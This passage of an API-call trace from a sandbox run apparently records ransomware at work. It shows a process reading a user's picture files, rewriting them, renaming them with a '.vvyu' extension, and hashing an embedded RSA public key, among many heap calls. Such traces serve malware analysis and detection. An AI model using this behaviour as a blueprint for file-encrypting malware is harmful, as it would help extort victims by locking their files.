Flags=0x0, Size=0xc) returned 0x2ae5f30 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f60 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f48 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f30 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ed0 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af33d8 | out: hHeap=0x2c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.751] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xa98b, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa98b, lpOverlapped=0x0) returned 1 [0190.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.752] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.752] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.753] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.753] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.753] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.753] CloseHandle (hObject=0x584) returned 1 [0190.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.755] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\hyglyDuy.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\hyglyduy.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\hyglyDuy.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\hyglyduy.bmp.vvyu")) returned 1 [0190.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.757] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.760] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa2c3f0, ftCreationTime.dwHighDateTime=0x1d89855, ftLastAccessTime.dwLowDateTime=0xd47c1510, ftLastAccessTime.dwHighDateTime=0x1d8a0eb, ftLastWriteTime.dwLowDateTime=0xd47c1510, ftLastWriteTime.dwHighDateTime=0x1d8a0eb, nFileSizeHigh=0x0, nFileSizeLow=0x170aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Iv7Y.bmp", cAlternateFileName="")) returned 1 [0190.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af33d8 [0190.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af33d8 | out: hHeap=0x2c0000) returned 1 [0190.760] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\Iv7Y.bmp") returned=".bmp" [0190.761] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\Iv7Y.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\iv7y.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.761] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=94378) returned 1 [0190.761] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.765] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17084, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.765] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.768] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.768] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x170aa, lpOverlapped=0x0) returned 1 [0190.773] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.773] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.773] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.773] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.774] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.774] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.774] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.774] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.774] GetLastError () returned 0x0 [0190.774] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.774] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.775] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.775] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.775] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x170b0) returned 0x2af5168 [0190.776] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af33d8 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3420 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.776] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0190.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5ed0 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.780] GetCurrentThreadId () returned 0x5d8 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5268 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.780] GetCurrentThreadId () returned 0x5d8 [0190.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, 